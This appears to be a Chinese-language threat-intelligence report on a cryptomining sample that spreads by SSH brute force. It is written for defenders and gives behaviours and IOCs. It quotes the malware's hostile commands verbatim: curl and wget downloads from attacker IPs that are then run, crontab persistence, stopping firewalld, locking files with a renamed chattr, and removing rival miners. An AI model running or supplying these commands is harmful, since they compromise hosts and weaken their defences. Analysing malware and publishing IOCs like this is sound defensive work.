报告信息

简述

该样本通过ssh登录后,存在一系列修改定时任务,清除挖矿竞品,重命名系统命令的行为,具有较强的挖矿样本的特征.

样本类型

挖矿

关键词

.mm.jpg,download.sh,x001804289383

elkeid 样本ID

elkeid_20221120_miner_4

捕获时间

20221120

最近活跃时间

20221120

已知入侵途径

  • 弱口令爆破

涉及样本

  • .mm.jpg
  • .chartroot.jpg
  • /tmp/download.sh

主要行为

  • 下载

    • curl -O https://testv.dns-alibaba.com/.mm.jpg
    • curl -O http://47.108.119.184:55555/.chartroot.jpg
    • apt-get -y install dnsutils
    • wget -t 1 http://107.189.7.193:9999/linux_amd64
    • wget http://107.189.7.193:9999/download.sh

  • 赋权

    • chmod 777 .mm.jpg
    • chmod +x linux_amd64
    • chmod 777 download.sh

  • 重命名系统命令

    • cp -f /usr/bin/chattr /usr/bin/lockr
    • /bin/bash -c cp -f -r -- /bin/.funzip /bin/.sh 2>/dev/null && /bin/.sh -c >/dev/null 2>&1 && rm -rf -- /bin/.sh 2>/dev/null

  • 执行

    • /bin/sh -c /root/pty > /dev/null 2>&1 &
    • crontab /var/run/.x001804289383
    • sh -c (crontab -l | grep -v "/root/pty" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x001804289383) > /dev/null 2>&1
    • ./download.sh
    • ./linux_amd64
    • /.img

  • 写入定时任务

    • sed -i /newinit.sh/d /etc/crontab
    • sed -i /null 2>&1/d /etc/crontab
    • bash -c echo "*/1 * * * * root /.img " >> /etc/crontab

  • 关闭防火墙

    • sudo service firewalld stop
    • systemctl stop firewalld.service

  • 锁定文件

    • lockr(原为chattr) +ai /etc/newinit.sh

  • 清理竞品

    • rm -rf /etc/systemd/system/c3pool_miner.service (4SHMiner)
    • lockr -ia /root/.xmrig.json
    • rm -rf /usr/lib/systemd/system/cryptsetup.service

  • 阻止竞品

    • iptables -A OUTPUT -m string --string auto.c3pool.org --algo bm --to 65535 -j DROP
    • iptables -I INPUT -s 45.9.148.117 -j DROP
    • iptables -I INPUT -s 45.9.148.125 -j DROP
    • iptables -I INPUT -s 35.205.61.67 -j DROP
    • iptables -I INPUT -s 178.128.108.158 -j DROP
    • iptables -I INPUT -s 45.9.148.99 -j DROP
    • iptables -A OUTPUT -m string --string download.c3pool.com --algo bm --to 65535 -j DROP

  • 收集系统信息

    • cat /etc/passwd
    • cat /etc/system-release
    • cat /proc/cpuinfo

IOC

  • 154.202.59.212
  • 47.108.119.184
  • 107.189.7.193

参考链接

  • https://vms.drweb.cn/virus/?i=24091822 ——具有相似行为
  • 107.189.7.193

https://www.virustotal.com/gui/url/bc951dfd70063b44411beb948c4132d3091dbe43c629982de40a5b29f30201b1